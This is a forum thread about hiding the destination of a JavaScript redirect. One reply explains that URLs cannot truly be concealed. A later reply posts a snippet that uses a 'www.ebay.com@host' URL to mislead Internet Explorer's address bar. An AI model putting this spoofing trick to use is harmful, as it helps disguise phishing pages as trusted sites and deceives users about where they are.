URL redirecting script - with cloaking?

Nymphetamine

<script language="JavaScript">
if (parent.frames.length==0) {
location.href = ""
}
</script

I use the above script to redirect websites but is there any script
that can hide the new url? or do I have to pay redirection.net?

David Dorward

Nymphetamine said:
I use the above script to redirect websites but is there any script
that can hide the new url? or do I have to pay redirection.net?

There is no way to prevent the user finding out the real URI of a resource.
The browser have to know what it is before it can get it, and anything the
browser can know, the user can know.

Frames can cover up the address bar for the real URI, but they are easily
bypassed and unfriendly to search engines, bookmarkers, link sharers, etc.

Grant Wagner

David said:
There is no way to prevent the user finding out the real URI of a resource.
The browser have to know what it is before it can get it, and anything the
browser can know, the user can know.

Frames can cover up the address bar for the real URI, but they are easily
bypassed and unfriendly to search engines, bookmarkers, link sharers, etc.

You're right of course, eventually the user can determine the URL of where they
really are, if they are savvy enough. However, sometimes it isn't as obvious as
it would first appear. Take the following code and save it on your server as
"ietrick.html", then load the page in any new, fully patched version of
Internet Explorer and click the Test link. Then look in the Address bar.

onclick="
window.location.href =
unescape('http://www.ebay.com@http://yourhost/ietrick.html');
return false;